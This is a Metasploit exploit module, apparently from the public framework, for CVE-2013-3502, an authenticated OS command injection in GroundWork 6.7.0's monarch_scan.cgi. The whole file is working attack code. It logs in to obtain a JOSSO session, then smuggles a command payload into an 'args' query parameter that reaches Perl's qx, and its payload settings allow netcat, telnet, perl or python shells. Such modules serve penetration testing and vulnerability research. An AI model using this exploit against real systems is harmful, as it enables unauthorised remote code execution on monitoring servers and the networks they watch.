## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => "GroundWork monarch_scan.cgi OS Command Injection", 'Description' => %q{ This module exploits a vulnerability found in GroundWork 6.7.0. This software is used for network, application and cloud monitoring. The vulnerability exists in the monarch_scan.cgi where user controlled input is used in the perl qx function. This allows any remote authenticated attacker, regardless of privileges, to inject system commands and gain arbitrary code execution. The module has been tested successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04 based VM appliance. }, 'License' => MSF_LICENSE, 'Author' => [ 'Johannes Greil', # Vulnerability Discovery, PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-3502' ], [ 'OSVDB', '91051' ], [ 'US-CERT-VU', '345260' ], [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ] ], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 8190, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', # Based on the default Ubuntu 10.04 VM appliance 'RequiredCmd' => 'generic telnet netcat perl python' }, }, 'Platform' => %w{linux unix}, 'Targets' => [ ['GroundWork 6.7.0', {}] ], 'Privileged' => false, 'DisclosureDate' => '2013-03-08', 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options( [ OptString.new('USERNAME', [true, 'GroundWork Username', 'user']), OptString.new('PASSWORD', [true, 'GroundWork Password', 'user']) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("josso", "signon", "login.do") }) if res and res.body =~ /GroundWork.*6\.7\.0/ return Exploit::CheckCode::Appears elsif res and res.body =~ /GroundWork/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def get_josso_token res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("josso", "signon", "usernamePasswordLogin.do"), 'vars_post' => { 'josso_cmd' => 'login', 'josso_username' => datastore['USERNAME'], 'josso_password' => datastore['PASSWORD'] } }) if res and res.get_cookies =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/ return $1 else return nil end end def execute_command(command) http_handler = ((datastore['SSL']) ? "https" : "http") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("monarch", "monarch_scan.cgi"), 'headers' => { 'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc" }, 'cookie' => "JOSSO_SESSIONID=#{@josso_id}", 'query' => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}" }) return res end def exploit peer = "#{rhost}:#{rport}" print_status("Attempting to login...") @josso_id = get_josso_token if @josso_id.nil? fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID") end print_good("Authentication successful") print_status("Sending malicious request...") execute_command(payload.encoded) end end